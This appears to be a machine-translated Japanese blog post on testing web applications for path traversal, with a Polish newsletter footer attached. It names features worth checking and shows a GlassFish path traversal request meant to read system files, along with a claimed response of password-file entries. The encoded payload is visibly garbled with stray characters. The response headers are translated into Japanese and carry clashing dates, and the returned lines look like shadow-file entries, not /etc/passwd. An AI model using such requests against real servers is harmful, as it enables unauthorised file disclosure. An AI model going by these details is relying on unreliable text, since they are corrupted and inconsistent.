パストラバーサル感受性試験

パストラバーサルの脆弱性は、Webアプリケーションがアクセスを拒否する必要があるファイルまたはディレクトリへの不正アクセスを許可しているかどうかを確認します。 この種類の攻撃では、アプリケーションに渡されるパラメータを使用して、ディレクトリの内容の読み取り、書き込み、表示など、特定の操作が実行されるリソースへのパスを示します。 その結果、冗長情報、構成ファイル、さらにはコードをリモートで実行する機能が漏洩する可能性があります。 パストラバーサルの脆弱性は、ソフトウェアまたはその機能の異なる要素で発生する可能性があります。 テスト中にスキップする場所はありませんが、特に注意を払う機能があります。

  • サーバーからファイルをダウンロードする機能
  • アプリケーション設定の読み込み (テンプレート、スタイル、インターフェイス言語) を担当する機能
  • サーバーへのファイルのアップロードを担当する機能です。


パストラバーサル脆弱性テストでは、HTTPプロキシを使用できます。 バープ スイート プロキシ. パスのパラメーターなど、適切な文字列を追加することで、パスを表すパラメーターを操作できます。 "../"、現在処理されているディレクトリから「飛び出す」ことを目的としています。 次の図の例を示します。

HTTP プロキシは、パストラバーサルの脆弱性をテストするために使用できます。 バープ スイート プロキシ

パストラバーサルの脆弱性のもう一つの例として、GlassFish アプリケーションサーバーで見つかった 2015 年 8 月のバグが考えられます。 以下に示すように、適切な要求を呼び出すと、ディスクからファイルを読み取ることを許可されました。

GET /テーマ/%c0%ae%c0%ae%c0%c0%af%c0%c0%c0%c0%af%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%ae%c0%c0%c0%ae%c0%c0%c0%c0%c0%c0%c0%ae%a0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%ae%c0%c0%c0%c0%c0%c0%c0%c0%ce%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%c0%ae%c0%c0%c0 ae%c0%ae%c0%af%c0%ae%c0%af%c0%c0%c0%ae%c0%af%c0%c0%c0%ae%c0%ae%アエ・ア・ア・c0%アフェド
HTTP/1.1
ホスト:127.0.0.1




これに対して、サーバーは /etc/passwd ファイルの内容を返します。

HTTP/1.1 200 OK
サーバー: GlassFishサーバーオープンソース版 4.1
Xパワードバイ: サーブレット/3.1 JSP/2.3 (GlassFishサーバーオープンソース版 4.1
Java/Oracle Corporation/1.7)
最終更新日: 火, 13 Jan 2015 10:00:00 GMT
日: 火, 2015年1月10日 10:00:00 GMT
接続: クローズ
コンテンツ長: 1087
ルート:!:16436:0:99999:7::
デーモン:*:16273:0:99999:7::
bin:*:16273:0:99999:7:::sys:*:16273:0:99999:7:::

同期:*:16273:0:99999:7::[.]

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). <br> Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

ブックマーク パーマリンク.

Podziel się swoją opinią na temat artykułu